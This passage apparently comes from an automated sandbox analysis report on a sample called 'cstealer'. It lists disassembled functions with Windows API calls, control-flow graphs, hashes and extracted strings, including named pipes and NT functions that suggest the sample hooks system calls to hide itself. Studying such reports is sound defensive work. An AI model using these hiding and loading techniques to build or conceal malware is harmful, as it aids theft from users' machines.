                                                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                            • Instruction Fuzzy Hash: B8116D30A187C086FB60ABA1F8453D9F2E7BB58377F504524AB06827B1EF78C048A2C4
                                                                                                                                                            Function 0000014E71284DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3733156554-0
                                                                                                                                                            • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                                                            • Instruction ID: 56d9d1b1254f5d4036e42dbc76622af3a7c13dc4e9148c0a185cc9f88d9fa650
                                                                                                                                                            • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                                                            • Instruction Fuzzy Hash: FFF0B736218B8485D730EB85E45179ABBE1F388BE5F144116BB8D47BB9CA38C6909B80
                                                                                                                                                            Function 0000014E7125273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 475 14e7125273c-14e712527a4 call 14e712529d4 * 4 484 14e712529b2 475->484 485 14e712527aa-14e712527ad 475->485 487 14e712529b4-14e712529d0 484->487 485->484 486 14e712527b3-14e712527b6 485->486 486->484 488 14e712527bc-14e712527bf 486->488 488->484 489 14e712527c5-14e712527e6 VirtualAlloc 488->489 489->484 490 14e712527ec-14e7125280c 489->490 491 14e7125280e-14e71252836 490->491 492 14e71252838-14e7125283f 490->492 491->491 491->492 493 14e71252845-14e71252852 492->493 494 14e712528df-14e712528e6 492->494 493->494 497 14e71252858-14e7125286a LoadLibraryA 493->497 495 14e71252992-14e712529b0 494->495 496 14e712528ec-14e71252901 494->496 495->487 496->495 498 14e71252907 496->498 499 14e712528ca-14e712528d2 497->499 500 14e7125286c-14e71252878 497->500 503 14e7125290d-14e71252921 498->503 499->497 501 14e712528d4-14e712528d9 499->501 504 14e712528c5-14e712528c8 500->504 501->494 506 14e71252923-14e71252934 503->506 507 14e71252982-14e7125298c 503->507 504->499 505 14e7125287a-14e7125287d 504->505 511 14e7125287f-14e712528a5 505->511 512 14e712528a7-14e712528b7 505->512 509 14e7125293f-14e71252943 506->509 510 14e71252936-14e7125293d 506->510 507->495 507->503 514 14e71252945-14e7125294b 509->514 515 14e7125294d-14e71252951 509->515 513 14e71252970-14e71252980 510->513 516 14e712528ba-14e712528c1 511->516 512->516 513->506 513->507 514->513 518 14e71252963-14e71252967 515->518 519 14e71252953-14e71252961 515->519 516->504 518->513 520 14e71252969-14e7125296c 518->520 519->513 520->513
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3550616410-0
                                                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                            • Instruction ID: 398329cb4db2ed4ca767fe8d5a4e9a8539d5239af5a1516b02ff51a455bd4c3d
                                                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                            • Instruction Fuzzy Hash: 5761DC72B01790C7DA548F1590807A9B3E2FB54BA5F2881619F59877D8EA38E852E780
                                                                                                                                                            Function 0000014E71281ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 0000014E71281628: GetProcessHeap.KERNEL32 ref: 0000014E71281633
                                                                                                                                                              • Part of subcall function 0000014E71281628: HeapAlloc.KERNEL32 ref: 0000014E71281642
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E712816B2
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E712816DF
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E712816F9
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E71281719
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E71281734
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E71281754
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E7128176F
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E7128178F
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E712817AA
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E712817CA
                                                                                                                                                            • Sleep.KERNEL32 ref: 0000014E71281AD7
                                                                                                                                                            • SleepEx.KERNEL32 ref: 0000014E71281ADD
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E712817E5
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E71281805
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E71281820
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E71281840
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E7128185B
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E7128187B
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E71281896
                                                                                                                                                              • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E712818A0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1534210851-0
                                                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                            • Instruction ID: 1714c45920598ec86e67a74f0c3539577901a3c57681baaef35927f31b664931
                                                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                            • Instruction Fuzzy Hash: FC31BA7131178149EB549BA6DA412E9B3E7BB44BF3F0854219F09877F9FE24C851A290
                                                                                                                                                            Function 0000014E71283844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 560 14e71283844-14e7128384f 561 14e71283869-14e71283870 560->561 562 14e71283851-14e71283864 StrCmpNIW 560->562 562->561 563 14e71283866 562->563 563->561
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: dialer
                                                                                                                                                            • API String ID: 0-3528709123
                                                                                                                                                            • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                                                            • Instruction ID: 7508334535fa1a9d507ec3434b5e7ea2f55434ff1646f8d531f4a59cd943759f
                                                                                                                                                            • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                                                            • Instruction Fuzzy Hash: 1ED05E703213C586FB549FEA88C86A0B3D2BB04B66F8841208A0002360EB18C98DB750

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 0000014E71287D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                            • Instruction ID: fd30b4135a47e4e14674e5136d7be7bd17dd7d775703eb5412fc0bea55a61a58
                                                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                            • Instruction Fuzzy Hash: 96317072205BC08AEB609F64E8803EDB3A1F784755F44442ADB4D57BA8EF38C548D754
                                                                                                                                                            Function 0000014E7128D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction ID: fbc977cd494d718dee943ce5c59727b77ad1b65654996d4f38853aacfac91a11
                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction Fuzzy Hash: 40313932214B8086DB608B65E8403DEB3E1F7897A5F500526EB9D52BA9DF38C1498B40
                                                                                                                                                            Function 0000014E712812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                            • Instruction ID: 6eeb1e8aac7f193eae1d1ec7f9d6d2867357cdba1f07a63c99b10fb470118c81
                                                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                            • Instruction Fuzzy Hash: 71515A76200B848AEB54CF66E44839AB7E2F788FEAF044525DB4A17769DF3CC049D740
                                                                                                                                                            Function 0000014E71281D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                            • Instruction ID: 7c24aa294964ab1abd883c58356ed4f4c15296c390029ee2d36ead7556732465
                                                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                            • Instruction Fuzzy Hash: 6531A874200BCAA1EB04EBE9E8656D4F3E3B724366F8054139A0922775EF38C249F3D0
                                                                                                                                                            Function 0000014E71256910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: 0e56285bd5da1bb7dc2a0f637ea244bb8522231b169bb3f6fa398e88d53c4f09
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction Fuzzy Hash: D781C0317003C186FA54AB2698C13D9F2E3BB957B2F5480A59B05837B6FB38C945B7C8
                                                                                                                                                            Function 0000014E7128CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32 ref: 0000014E7128CE37
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CE4C
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CE6D
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CE9A
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CEAB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CEBC
                                                                                                                                                            • SetLastError.KERNEL32 ref: 0000014E7128CED7
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CF0D
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,0000014E7128ECCC,?,?,?,?,0000014E7128BF9F,?,?,?,?,?,0000014E71287AB0), ref: 0000014E7128CF2C
                                                                                                                                                              • Part of subcall function 0000014E7128D6CC: HeapAlloc.KERNEL32 ref: 0000014E7128D721
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CF54
                                                                                                                                                              • Part of subcall function 0000014E7128D744: HeapFree.KERNEL32 ref: 0000014E7128D75A
                                                                                                                                                              • Part of subcall function 0000014E7128D744: GetLastError.KERNEL32 ref: 0000014E7128D764
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CF65
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CF76
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                            • Instruction ID: 1b30ba423596484fb5128bd65707c931c46e7bf791391d31e0f543c00011cff9
                                                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                            • Instruction Fuzzy Hash: 48416C303613D446FB68A7B555513E9F2C3BBA47B6F144724AB3606BF6EF28D421B280
                                                                                                                                                            Function 0000014E71282244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                            • Instruction ID: 4cbd714d52a7a041574da3b6e1973390df3e65effd47716e8f5b57b748c4e565
                                                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                            • Instruction Fuzzy Hash: 25213D3261479082EB108B25E4543A9B3E2F789BA6F500615EB5913BB8DF3CC149DB40
                                                                                                                                                            Function 0000014E71259944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                            • Instruction ID: 8f1849844508fc59c699d09de6a54d81953bcee2eacf0b3632ce14d61c59d75c
                                                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                            • Instruction Fuzzy Hash: 21E1AE326047808AEF60DF25D4813DDB7E2F749BAAF200155EF8957BA9EB34C491E780
                                                                                                                                                            Function 0000014E7128A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                            • Instruction ID: 7acac506dbf0b3f7991eebea42848c6c7b3450c9a6a393424932456b159f4353
                                                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                            • Instruction Fuzzy Hash: 31E18E726047808AEB60DFA5D4403DDB7E2F785BA9F140115EF8957BA9CF38D191D780
                                                                                                                                                            Function 0000014E7128F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                            • Instruction ID: 8186f026a51797cedf324e4c7b833b61352a0df49802851986cc84cb3ea2c215
                                                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                            • Instruction Fuzzy Hash: 1D41E232311B8081EB16DB9AA8007D6B3D3F754BF2F1945269F0A977A4EF38C445A394
                                                                                                                                                            Function 0000014E7128104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction ID: 82d12ecdb729c6e226656d47255641b3ae2fc389c25ba39a262584264f204760
                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction Fuzzy Hash: AE414F73214BC4CAE760CF65E44479AB7E2F388B99F448129DB8A17B68DF38C549CB40
                                                                                                                                                            Function 0000014E7128D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0A6
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0CE
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0DF
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0F0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction ID: bf77c6765b4644b33ee99522ab16b9159603e69d51afd68a77ed61af449e71df
                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction Fuzzy Hash: 66118E307043D841FB68A7B569513E9F2C37F943F6F144324AA3946BFADE68D406A380
                                                                                                                                                            Function 0000014E71287510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: bfe51ab508fc4dfb401425e8cdfea22ce7602dc8a724d4b31b50981c66ecc966
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
